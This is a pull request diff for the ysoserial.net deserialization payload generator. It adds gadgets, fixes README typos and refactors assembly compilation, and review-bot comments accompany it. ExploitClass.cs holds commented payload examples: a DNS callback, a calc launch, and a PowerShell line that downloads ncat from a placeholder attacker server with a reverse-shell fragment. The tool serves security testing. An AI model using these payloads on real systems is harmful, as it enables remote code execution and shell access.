Adding new gadgets & improvements #141

Merged
merged 1 commit into from
Nov 24, 2022
8 changes: 4 additions & 4 deletions ExploitClass/ExploitClass.cs
@@ -8,11 +8,11 @@ public E()
/* Payload code to be executed. Examples: */


/* Showing a message box: -c "ExploitClass.cs;./dlls/System.Windows.Forms.dll" */
/* Showing a message box: -c "ExploitClass.cs;System.Windows.Forms.dll" */
System.Windows.Forms.MessageBox.Show("Pwned", "Pwned", System.Windows.Forms.MessageBoxButtons.OK, System.Windows.Forms.MessageBoxIcon.Error);


/* Creating a text file: -c "ExploitClass.cs;./dlls/System.dll" */
/* Creating a text file: -c "ExploitClass.cs;System.dll" */
/*
using (System.IO.StreamWriter outputFile = new System.IO.StreamWriter(@"C:\windows\temp\test.txt"))
{
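Review bot: the `-c` strings in the comments for the message-box and text-file examples now name the referenced assemblies as bare `System.Windows.Forms.dll` and `System.dll` instead of `./dlls/...`, but nothing in this hunk says where a bare name is resolved from, or whether a relative path such as the old `./dlls/System.dll` form still works. Add one sentence to the comment header stating the resolution rule the compiler now applies, so users who kept the `dlls` folder layout from the previous version know which form to use.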
@@ -21,11 +21,11 @@ public E()
//*/


/* Making a DNS request for PoC (System.dll needs to be in the dlls folder): -c "ExploitClass.cs;./dlls/System.dll" */
/* Making a DNS request for PoC (System.dll needs to be in the dlls folder): -c "ExploitClass.cs;System.dll" */
//System.Net.Dns.Resolve("8z89j28ubxz878iktsny9abwyn4ds2.burpcollaborator.net");


/* Running a command: -c "ExploitClass.cs;./dlls/System.dll" */
/* Running a command: -c "ExploitClass.cs;System.dll" */
//System.Diagnostics.Process.Start("cmd.exe", "/c calc");
//System.Diagnostics.Process.Start("powershell.exe", "-Command \"(New-Object Net.WebClient).DownloadFile(\\\"http://AttackerServer/ncat.exe\\\", \\\"c:\\windows\\temp\\ncat.exe\\\")\"");// & c:\\windows\\temp\\ncat.exe -nv AttackerServerIP 4444 -e powershell.exe");

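Review bot: the DNS example comment still says `System.dll needs to be in the dlls folder` while its `-c` string was changed to the bare `System.dll`, so the parenthetical is now stale; drop it or reword it to match the new reference form. In the same hunk, `System.Net.Dns.Resolve` is marked obsolete in .NET Framework and compiling it emits a warning; `System.Net.Dns.GetHostEntry` is the non-obsolete call for the same PoC. The commented `powershell.exe` line also ends in a dangling `// & c:\\windows\\temp\\ncat.exe -nv AttackerServerIP 4444 -e powershell.exe");` fragment that is neither a complete statement nor a separate comment, which will confuse anyone who uncomments the line.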
69 changes: 52 additions & 17 deletions README.md
@@ -58,31 +58,60 @@ ysoserial.net generates deserialization payloads for a variety of .NET formatter

(*) AxHostState
Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer , SoapFormatter
Labels: Bridge and dervied
Labels: Bridge and derived
Supported formatter for the bridge: BinaryFormatter
(*) ClaimsIdentity
Formatters: BinaryFormatter , LosFormatter , SoapFormatter
Labels: Bridge and dervied, OnDeserialized
Labels: Bridge and derived, OnDeserialized
Supported formatter for the bridge: BinaryFormatter
(*) ClaimsPrincipal
Formatters: BinaryFormatter , LosFormatter , SoapFormatter
Labels: Bridge and dervied, OnDeserialized, SecondOrderDeserialization
Labels: Bridge and derived, OnDeserialized, SecondOrderDeserialization
Supported formatter for the bridge: BinaryFormatter
(*) DataSet
Formatters: BinaryFormatter , LosFormatter , SoapFormatter
Labels: Bridge and dervied
Labels: Bridge and derived
Supported formatter for the bridge: BinaryFormatter
(*) DataSetTypeSpoof [A more advanced type spoofing which can use any arbtirary types can be seen in TestingArenaHome::SpoofByBinaryFormatterJson]
(*) DataSetOldBehaviour [This gadget targets and old behaviour of DataSet which uses XML format]
Formatters: BinaryFormatter , LosFormatter
Labels: Bridge and derived
Supported formatter for the bridge: LosFormatter
Extra options:
--spoofedAssembly=VALUE
The numerical internal gadget choice to use:
1=TypeConfuseDelegate,
2=TextFormattingRunProperties (default: 1
[TypeConfuseDelegate])

(*) DataSetOldBehaviourFromFile [Another variant of the DataSetOldBehaviour gadget. This gadget interprets the command parameter as path to the .cs file that should be compiled as exploit class. Use semicolon to separate the file from additionally required assemblies, e. g., '-c ExploitClass.cs;System.Windows.Forms.dll']
Formatters: BinaryFormatter , LosFormatter
Labels: Bridge and derived
Extra options:
-x=VALUE The numerical internal gadget choice to use:
1=TypeConfuseDelegate,
2=TextFormattingRunProperties (default: 1
[TypeConfuseDelegate])

(*) DataSetTypeSpoof [A more advanced type spoofing which can use any arbitrary types can be seen in TestingArenaHome::SpoofByBinaryFormatterJson or in the DataSetOldBehaviour gadget]
Formatters: BinaryFormatter , LosFormatter , SoapFormatter
Labels: Bridge and dervied
Labels: Bridge and derived
Supported formatter for the bridge: BinaryFormatter
(*) GenericPrincipal
Formatters: BinaryFormatter , LosFormatter
Labels: Bridge and derived, OnDeserialized, SecondOrderDeserialization
Supported formatter for the bridge: BinaryFormatter
Extra options:
--var, --variant=VALUE Payload variant number where applicable.
Choices: 1 (uses serialized ClaimsIdentities), 2
(uses serialized Claims)

(*) ObjectDataProvider
Formatters: DataContractSerializer (2) , FastJson , FsPickler , JavaScriptSerializer , Json.Net , SharpSerializerBinary , SharpSerializerXml , Xaml (4) , XmlSerializer (2) , YamlDotNet < 5.0.0
Labels: Not bridge or derived
Extra options:
--var, --variant=VALUE Payload variant number where applicable.
Choices: 1, 2, 3, ... based on formatter.
--xamlurl=VALUE This is to create a very short paylaod when
--xamlurl=VALUE This is to create a very short payload when
affected box can read the target XAML URL e.g.
"http://b8.ee/x" (can be a file path on a shared
drive or the local system). This is used by the
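Review bot: the help text for `--spoofedAssembly=VALUE` under DataSetOldBehaviour reads `The numerical internal gadget choice to use: 1=TypeConfuseDelegate, 2=TextFormattingRunProperties`, which is word for word the text of the `-x=VALUE` option under DataSetOldBehaviourFromFile and says nothing about a spoofed assembly; either the option name or its description is wrong, and the README should be regenerated from the tool's actual `--help` output rather than hand-edited. Smaller points in the same hunk: `This gadget targets and old behaviour` should read `an old behaviour`; DataSetOldBehaviourFromFile is labelled `Bridge and derived` but, unlike DataSetOldBehaviour directly above it, has no `Supported formatter for the bridge` line; and `e. g.,` in its description has a stray space.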
@@ -108,21 +137,21 @@ ysoserial.net generates deserialization payloads for a variety of .NET formatter

(*) RolePrincipal
Formatters: BinaryFormatter , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter
Labels: Bridge and dervied
Labels: Bridge and derived
Supported formatter for the bridge: BinaryFormatter
(*) SessionSecurityToken
Formatters: BinaryFormatter , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter
Labels: Bridge and dervied
Labels: Bridge and derived
Supported formatter for the bridge: BinaryFormatter
(*) SessionViewStateHistoryItem
Formatters: BinaryFormatter , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter
Labels: Bridge and dervied
Labels: Bridge and derived
Supported formatter for the bridge: LosFormatter
(*) TextFormattingRunProperties [This normally generates the shortest payload]
Formatters: BinaryFormatter , DataContractSerializer , LosFormatter , NetDataContractSerializer , SoapFormatter
Labels: Not bridge but derived
Extra options:
--xamlurl=VALUE This is to create a very short paylaod when
--xamlurl=VALUE This is to create a very short payload when
affected box can read the target XAML URL e.g.
"http://b8.ee/x" (can be a file path on a shared
drive or the local system). This is used by the
@@ -135,7 +164,7 @@ ysoserial.net generates deserialization payloads for a variety of .NET formatter

(*) ToolboxItemContainer
Formatters: BinaryFormatter , LosFormatter , SoapFormatter
Labels: Bridge and dervied
Labels: Bridge and derived
Supported formatter for the bridge: BinaryFormatter
(*) TypeConfuseDelegate
Formatters: BinaryFormatter , LosFormatter , NetDataContractSerializer
@@ -145,19 +174,19 @@ ysoserial.net generates deserialization payloads for a variety of .NET formatter
Labels: Not bridge or derived
(*) WindowsClaimsIdentity [Requires Microsoft.IdentityModel.Claims namespace (not default GAC)]
Formatters: BinaryFormatter (3) , DataContractSerializer (2) , Json.Net (2) , LosFormatter (3) , NetDataContractSerializer (3) , SoapFormatter (2)
Labels: Bridge and dervied, Not in GAC
Labels: Bridge and derived, Not in GAC
Supported formatter for the bridge: BinaryFormatter
Extra options:
--var, --variant=VALUE Payload variant number where applicable.
Choices: 1, 2, or 3 based on formatter.

(*) WindowsIdentity
Formatters: BinaryFormatter , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter
Labels: Bridge and dervied
Labels: Bridge and derived
Supported formatter for the bridge: BinaryFormatter
(*) WindowsPrincipal
Formatters: BinaryFormatter , DataContractJsonSerializer , DataContractSerializer , Json.Net , LosFormatter , NetDataContractSerializer , SoapFormatter
Labels: Bridge and dervied
Labels: Bridge and derived

== PLUGINS ==
(*) ActivatorUrl (Sends a generated payload to an activated, presumably remote, object)
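Review bot: WindowsPrincipal is labelled `Bridge and derived` but its entry ends without the `Supported formatter for the bridge:` line that the other bridge gadgets in this hunk (WindowsClaimsIdentity, WindowsIdentity) carry; add the line or correct the label so the README matches what the tool prints.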
@@ -353,7 +382,7 @@ Options:
formatters). Default: true
--raf, --runallformatters
Whether to run all the gadgets with the provided
formatter (ignores gagdet name, output format,
formatter (ignores gadget name, output format,
and the test flag arguments). This will search
in formatters and also show the displayed
payload length. Default: false
@@ -479,7 +508,7 @@ Special thanks to all contributors:
$ ./ysoserial.exe --credit

ysoserial.net has been originally developed by Alvaro Munoz (@pwntester)
this tool is being maintained by Alvaro Munoz (@pwntester) and Soroush Dalili (@irsdl)
this tool is being maintained by Soroush Dalili (@irsdl) and Alvaro Munoz (@pwntester)

Credits for available gadgets:
ActivitySurrogateDisableTypeCheck
@@ -496,8 +525,14 @@ Credits for available gadgets:
[Finders: jang]
DataSet
[Finders: James Forshaw] [Contributors: Soroush Dalili]
DataSetOldBehaviour
[Finders: Steven Seeley] [Contributors: Soroush Dalili]
DataSetOldBehaviourFromFile
[Finders: Steven Seeley, Markus Wulftange] [Contributors: Soroush Dalili]
DataSetTypeSpoof
[Finders: James Forshaw] [Contributors: Soroush Dalili, Markus Wulftange, Jang]
GenericPrincipal
[Finders: Soroush Dalili]
ObjectDataProvider
[Finders: Oleksandr Mirosh, Alvaro Munoz] [Contributors: Alvaro Munoz, Soroush Dalili, Dane Evans]
ObjRef
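Review bot: the new DataSetTypeSpoof credit line spells the contributor as `Jang` while the existing `[Finders: jang]` entry two lines above spells it `jang`; pick one casing so the credits list is consistent, since this text is printed verbatim by `--credit`.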
@@ -19,22 +19,7 @@ public PayloadClassFromFile(string file, int variant_number, InputArgs inputArgs
{
this.variant_number = variant_number;
this.inputArgs = inputArgs;
string[] files = file.Split(new[] { ';' }).Select(s => s.Trim()).ToArray();
CodeDomProvider codeDomProvider = CodeDomProvider.CreateProvider("CSharp");
CompilerParameters compilerParameters = new CompilerParameters();
compilerParameters.CompilerOptions = "-t:library -o+ -platform:anycpu";
compilerParameters.ReferencedAssemblies.AddRange(files.Skip(1).ToArray());
CompilerResults compilerResults = codeDomProvider.CompileAssemblyFromFile(compilerParameters, files[0]);
if (compilerResults.Errors.Count > 0)
{
foreach (CompilerError error in compilerResults.Errors)
{
Console.Error.WriteLine(error.ErrorText);
}
Environment.Exit(-1);
}
base.assemblyBytes = File.ReadAllBytes(compilerResults.PathToAssembly);
File.Delete(compilerResults.PathToAssembly);
base.assemblyBytes = LocalCodeCompiler.CompileToAsmBytes(file);
}
}

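Review bot: the removed block printed every `CompilerError` to stderr and called `Environment.Exit(-1)` on failure, and it deleted the temporary assembly at `compilerResults.PathToAssembly` after reading it; the single `LocalCodeCompiler.CompileToAsmBytes(file)` call that replaces it is not part of this diff, so a reviewer cannot see whether compile errors are still surfaced and whether the temp file is still cleaned up. Point at the `LocalCodeCompiler` change in this PR, or document on `CompileToAsmBytes` how it reports failure (exception versus exit). Also check whether the `using` directives for `System.CodeDom.Compiler`, `System.IO` and `System.Linq` at the top of this file are now unused and should go.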